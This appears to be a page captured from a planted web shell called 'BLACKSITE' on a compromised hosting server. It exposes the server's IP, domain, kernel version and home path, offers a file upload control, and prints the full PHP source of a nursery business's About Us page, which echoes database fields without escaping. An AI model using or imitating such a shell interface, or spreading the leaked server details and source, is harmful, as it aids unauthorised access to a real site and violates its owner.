BLACKSITE
:
216.73.216.137
:
157.173.108.86 / pdclassessgnr.in
:
Linux server.madnetech.com 4.18.0-553.117.1.el8_10.x86_64 #1 SMP Sun Apr 5 23:14:32 EDT 2026 x86_64
:
/
home
/
balaji
/
public_html
/
Upload File:
files >> /home/balaji/public_html/aboutus.php
<!doctype html> <html class="no-js" lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <title>About Us - Balaji Nursery</title> <meta name="description" content=""> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="apple-touch-icon" href="img/apple-touch-icon.png"> <link rel="shortcut icon" type="image/x-icon" href="img/icon/favicon.ico"> <!-- Place favicon.ico in the root directory --> <!-- all css here --> <link rel="stylesheet" href="css/bootstrap.min.css"> <link rel="stylesheet" href="css/font-awesome.min.css"> <link rel="stylesheet" href="css/material-design-iconic-font.min.css"> <link rel="stylesheet" href="css/magnific-popup.css"> <link rel="stylesheet" href="css/venobox.css"> <link rel="stylesheet" href="css/meanmenu.min.css"> <link rel="stylesheet" href="css/shortcode/shortcodes.css"> <link rel="stylesheet" href="css/plugins.css"> <link rel="stylesheet" href="style.css"> <link rel="stylesheet" href="css/responsive.css"> <script src="js/vendor/modernizr-2.8.3.min.js"></script> </head> <body> <!--[if lt IE 8]> <p class="browserupgrade">You are using an <strong>outdated</strong> browser. Please <a href="http://browsehappy.com/">upgrade your browser</a> to improve your experience.</p> <![endif]--> <!-- Page Wraper Here Start --> <div class="page-wraper"> <?php include('header.php') ?> <!-- page Content Start --> <div class="page-content"> <!-- Breadcamb Area Start --> <section class="breadcamb-area bg-8 ptb-170"> <div class="container"> <div class="row"> <div class="col-md-12"> <div class="bradcamb-content text-center text-white"> <h1>About Us</h1> <ul> <li><a href="index.php">Home <span>//</span></a></li> <li>About Us</li> </ul> </div> </div> </div> </div> </section> <!-- Breadcamb Area End --> <!-- About Us Area Start --> <section class="about-us-area pt-40 pb-40 bg-1"> <div class="container"> <div class="row"> <?php $sql_query="SELECT * FROM about_us"; $result_set=mysqli_query($con,$sql_query); $fetched_row=mysqli_fetch_array($result_set,MYSQLI_ASSOC); ?> <!-- About Us Left Start --> <div class="col-md-7"> <div class="about-us-left text-center"> <h3>Welcome to BALAJI NURSERY</h3> <div class="abt-text"> <p style="text-align:justify; font-size:15px;"><?php echo $fetched_row['intro'] ?></p> </div> <div class="abt-btn"> <a href="aboutus.php">Read More</a> </div> </div> </div> <!-- About Us Left End --> <!-- About Us Right Start --> <div class="col-md-5 pb-10"> <div class="about-us-right"> <img src="admin/uploads/about/<?php echo $fetched_row['intro_image'] ?>" alt="" style="height:300px; width:100%"/> </div> </div> <!-- About Us Right End --> </div> </div> </section> <!-- About Us Area End --> <!-- Our Service Area Startt --> <section class="our-service pt-100 pb-80"> <div class="container"> <!-- Section Titel --> <div class="row"> <div class="col-md-12"> <div class="section-titel mb-50 text-center"> <h3>Our Services</h3> </div> </div> </div> <!-- Section Titel --> <?php $sql_query="SELECT * FROM aboutpoints"; $result_set=mysqli_query($con,$sql_query); $fetched_row=mysqli_fetch_array($result_set,MYSQLI_ASSOC); ?> <div class="row"> <div class="our-srvice-left"> <div class="col-md-4 col-sm-6 col-xs-12"> <div class="service-single"> <ul> <li> <div class="service-img"> <img src="img/icon/leaf.png" alt=""> </div> <div class="servce-cntnt"> <h5><?php echo $fetched_row['point1'] ?></h5> <p><?php echo $fetched_row['point1_desc'] ?></p> </div> </li> <li> <div class="service-img"> <img src="img/icon/hand.png" alt=""> </div> <div class="servce-cntnt"> <h5><?php echo $fetched_row['point2'] ?></h5> <p><?php echo $fetched_row['point2_desc'] ?></p> </div> </li> <li> <div class="service-img"> <img src="img/icon/kata.png" alt=""> </div> <div class="servce-cntnt"> <h5><?php echo $fetched_row['point3'] ?></h5> <p><?php echo $fetched_row['point3_desc'] ?></p> </div> </li> </ul> </div> </div> <!-- Service Middle --> <div class="col-md-4 hidden-sm col-xs-12"> <div class="service-single"> <img src="img/other/abt-mdl.png" alt=""> </div> </div> <!-- Service Middle --> <!-- Service Right --> <div class="our-service-right"> <div class="col-md-4 col-sm-6 col-xs-12"> <div class="service-single"> <ul> <li> <div class="service-img"> <img src="img/icon/tube.png" alt=""> </div> <div class="servce-cntnt"> <h5><?php echo $fetched_row['point4'] ?></h5> <p><?php echo $fetched_row['point4_desc'] ?></p> </div> </li> <li> <div class="service-img"> <img src="img/icon/chamis.png" alt=""> </div> <div class="servce-cntnt"> <h5><?php echo $fetched_row['point5'] ?></h5> <p><?php echo $fetched_row['point5_desc'] ?></p> </div> </li> <li> <div class="service-img"> <img src="img/icon/tree.png" alt=""> </div> <div class="servce-cntnt"> <h5><?php echo $fetched_row['point6'] ?></h5> <p><?php echo $fetched_row['point6_desc'] ?></p> </div> </li> </ul> </div> </div> </div> <!-- Service Right --> </div> </div> </div> </section> <!-- Our Service Area End --> <!-- Features Area Start --> <section class="features-service ptb-75"> <div class="container"> <div class="row"> <?php $sql_query="SELECT * FROM why_choose_us"; $result_set=mysqli_query($con,$sql_query); $i=1; while($row=mysqli_fetch_row($result_set)) { ?> <!-- Features Service Single --> <div class="col-md-4 col-sm-6 col-xs-12"> <div class="features-service-single border"> <div class="fes-ser-titel text-center"> <span><i class="fa fa-leaf" aria-hidden="true"></i></span> <h4><?php echo $row[1]; ?></h4> </div> <div class="fes-ser-hover text-center"> <div class="hvr-icon"> <i class="fa fa-tencent-weibo" aria-hidden="true"></i> <h4><?php echo $row[1]; ?></h4> <p><?php echo $row[2]; ?></p> </div> </div> </div> </div> <!-- Features Service Single --> <?php $i++; } ?> </div> </div> </section> <!-- Features Area End --> </div> <!-- page Content End --> <?php include('footer.php') ?> </div> <!-- Page Wraper Here Start --> <!-- all js here --> <script src="js/vendor/jquery-1.12.4.min.js"></script> <script src="js/bootstrap.min.js"></script> <script src="js/jquery.ajaxchimp.min.js"></script> <script src="js/jquery.meanmenu.js"></script> <script src="js/plugins.js"></script> <script src="js/main.js"></script> </body> </html>